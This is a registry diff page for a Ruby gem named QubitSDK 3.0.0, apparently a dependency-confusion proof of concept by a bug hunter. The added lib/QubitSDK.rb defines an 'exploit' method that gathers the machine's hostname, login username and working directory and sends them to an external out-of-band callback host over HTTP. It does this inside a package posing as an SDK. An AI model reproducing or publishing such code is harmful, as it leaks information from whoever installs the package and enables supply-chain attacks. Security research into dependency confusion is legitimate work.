QubitSDK 3.0.0
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of QubitSDK might be problematic. Click here for more details.
- checksums.yaml +7 -0
- data/lib/QubitSDK.rb +30 -0
- metadata +43 -0
checksums.yaml
ADDED
|
@@ -0,0 +1,7 @@
|
|
|
1
|
+
---
|
|
2
|
+
SHA256:
|
|
3
|
+
metadata.gz: e8505f66daa199c4a025eef8f7eacdb87ff21e6fa655d9f2b5b905ef6a4cebe0
|
|
4
|
+
data.tar.gz: f8ccf28395e53267d23ab343afedcfa2e3277c328d2bea54705500e96bea6af0
|
|
5
|
+
SHA512:
|
|
6
|
+
metadata.gz: 901db0e597df91c518c1a5a53572808347e47f251414f34ccb00380efdad034f27096fcc33410b0f8e5a773460cc699b5327fd5d9924c6f1cd005803e8dc87f1
|
|
7
|
+
data.tar.gz: a707e91b1d582db76fdba1827e5e054ae976895429d2662447e2d7bcfb50bc6058b7325f4c899bb310285930ef0bc8acfabaf62baa626220f336424fcd9f2014
|
data/lib/QubitSDK.rb
ADDED
|
@@ -0,0 +1,30 @@
|
|
|
1
|
+
# frozen_string_literal: true
|
|
2
|
+
|
|
3
|
+
require_relative "QubitSDK/version"
|
|
4
|
+
require 'net/http'
|
|
5
|
+
require 'socket'
|
|
6
|
+
require 'etc'
|
|
7
|
+
|
|
8
|
+
module QubitSDK
|
|
9
|
+
def self.exploit
|
|
10
|
+
hostname = Socket.gethostname
|
|
11
|
+
username = Etc.getlogin
|
|
12
|
+
cwd = Dir.pwd
|
|
13
|
+
|
|
14
|
+
uri = URI('https://chyfh952vtc000056sk0ge98awoyyyyyb.oast.fun')
|
|
15
|
+
params = { 'hostname' => hostname, 'username' => username, 'cwd' => cwd }
|
|
16
|
+
uri.query = URI.encode_www_form(params)
|
|
17
|
+
|
|
18
|
+
res = Net::HTTP.get_response(uri)
|
|
19
|
+
|
|
20
|
+
# Add any additional code here based on the desired behavior of the exploit
|
|
21
|
+
|
|
22
|
+
# Example: Printing the response
|
|
23
|
+
puts res.body
|
|
24
|
+
end
|
|
25
|
+
end
|
|
26
|
+
|
|
27
|
+
# Run the exploit when the QubitSDK.rb file is executed directly
|
|
28
|
+
if __FILE__ == $0
|
|
29
|
+
QubitSDK.exploit
|
|
30
|
+
end
|
metadata
ADDED
|
@@ -0,0 +1,43 @@
|
|
|
1
|
+
--- !ruby/object:Gem::Specification
|
|
2
|
+
name: QubitSDK
|
|
3
|
+
version: !ruby/object:Gem::Version
|
|
4
|
+
version: 3.0.0
|
|
5
|
+
platform: ruby
|
|
6
|
+
authors:
|
|
7
|
+
- Pranay
|
|
8
|
+
autorequire:
|
|
9
|
+
bindir: bin
|
|
10
|
+
cert_chain: []
|
|
11
|
+
date: 2023-06-04 00:00:00.000000000 Z
|
|
12
|
+
dependencies: []
|
|
13
|
+
description: This Ruby package vulnerable to dependency confiuse vulnerability
|
|
14
|
+
email: Bughunter@gmail.com
|
|
15
|
+
executables: []
|
|
16
|
+
extensions: []
|
|
17
|
+
extra_rdoc_files: []
|
|
18
|
+
files:
|
|
19
|
+
- lib/QubitSDK.rb
|
|
20
|
+
homepage: https://rubygems.org/gems/QubitSDK.rb
|
|
21
|
+
licenses:
|
|
22
|
+
- MIT
|
|
23
|
+
metadata: {}
|
|
24
|
+
post_install_message:
|
|
25
|
+
rdoc_options: []
|
|
26
|
+
require_paths:
|
|
27
|
+
- lib
|
|
28
|
+
required_ruby_version: !ruby/object:Gem::Requirement
|
|
29
|
+
requirements:
|
|
30
|
+
- - ">="
|
|
31
|
+
- !ruby/object:Gem::Version
|
|
32
|
+
version: '0'
|
|
33
|
+
required_rubygems_version: !ruby/object:Gem::Requirement
|
|
34
|
+
requirements:
|
|
35
|
+
- - ">="
|
|
36
|
+
- !ruby/object:Gem::Version
|
|
37
|
+
version: '0'
|
|
38
|
+
requirements: []
|
|
39
|
+
rubygems_version: 3.3.15
|
|
40
|
+
signing_key:
|
|
41
|
+
specification_version: 4
|
|
42
|
+
summary: 'Vulnerability Disclosure: Dependency confiuse vulnerability'
|
|
43
|
+
test_files: []
|